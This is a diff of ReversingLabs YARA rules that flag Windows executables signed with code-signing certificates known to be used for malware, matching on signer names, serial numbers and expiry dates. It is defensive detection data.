@@ -24581,21 +46975,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amma" and ( pe.signatures [ i ] . serial == "00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures [ i ] . serial == "cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" ) and 1431734400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EKO-KHIM TOV" and ( pe.signatures [ i ] . serial == "00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures [ i ] . serial == "f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" ) and 1598989763 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694"
+		id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13150-L13166"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7162-L7180"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b"
+		logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24605,21 +46999,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpectorSoft Corp." and pe.signatures [ i ] . serial == "5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5 th Dimension LTD Oy" and ( pe.signatures [ i ] . serial == "00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures [ i ] . serial == "f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" ) and 1618531200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d29e2342-2d38-5939-aa3f-4506fb36c74a"
+		id = "25df791f-1128-51f9-90da-9977262d00c7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13168-L13184"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7182-L7200"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5"
+		logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24629,21 +47023,21 @@ rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Itgms Ltd" and pe.signatures [ i ] . serial == "64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEVELOP - Residence s. r. o." and ( pe.signatures [ i ] . serial == "00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures [ i ] . serial == "e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" ) and 1618358400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4db299c6-5be9-5900-a944-07a0a41920a4"
+		id = "7c685bb7-3201-5ffc-856b-657d824595ab"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13186-L13202"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7202-L7218"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c"
+		logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24653,21 +47047,21 @@ rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trambambon LLC" and pe.signatures [ i ] . serial == "53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020"
+		id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13204-L13220"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7220-L7238"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d"
+		logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24677,21 +47071,21 @@ rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and ( pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures [ i ] . serial == "d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" ) and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4"
+		id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13222-L13238"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7240-L7258"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042"
+		logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24701,21 +47095,21 @@ rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and ( pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures [ i ] . serial == "80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" ) and 1615507200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59"
+		id = "e45d66b0-58ae-5054-b0a7-47a001daac7a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13240-L13256"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7260-L7276"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe"
+		logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24725,21 +47119,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PhaseQ Limited" and pe.signatures [ i ] . serial == "0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "54e9ec00-d054-521b-b60b-81efe3a8ce12"
+		id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13258-L13274"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7278-L7294"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e"
+		logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24749,21 +47143,21 @@ rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Financial Security Institute, Inc." and pe.signatures [ i ] . serial == "0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "034228b3-1864-5a76-ad9d-531778be10ec"
+		id = "602b8c18-3dad-55b9-bb47-3f9835a049ac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13276-L13292"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7296-L7312"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7"
+		logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24773,21 +47167,21 @@ rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5"
+		id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13294-L13310"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7314-L7330"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50"
+		logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24797,21 +47191,21 @@ rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af7eb5ff-570f-5886-b550-3d327d05fabe"
+		id = "d5f810ee-127a-5df0-9299-ffeaddf369ee"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13312-L13328"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7332-L7348"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4"
+		logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24821,21 +47215,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures [ i ] . serial == "2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37"
+		id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13330-L13346"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7350-L7366"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8"
+		logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24845,21 +47239,21 @@ rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Technologies Ltd." and pe.signatures [ i ] . serial == "67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc"
+		id = "9d32947c-778f-5e2d-b0b1-4a17a108035e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13348-L13366"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7368-L7384"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da"
+		logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24869,21 +47263,21 @@ rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lossera-M, OOO" and ( pe.signatures [ i ] . serial == "00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures [ i ] . serial == "87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" ) and 1493078400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c459c3ac-205c-5c13-959d-c6b40f81222f"
+		id = "7e13e257-a264-5a40-b670-889045504acf"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13368-L13384"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7386-L7404"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51"
+		logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24893,21 +47287,21 @@ rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LCB SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and ( pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures [ i ] . serial == "b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" ) and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41"
+		id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
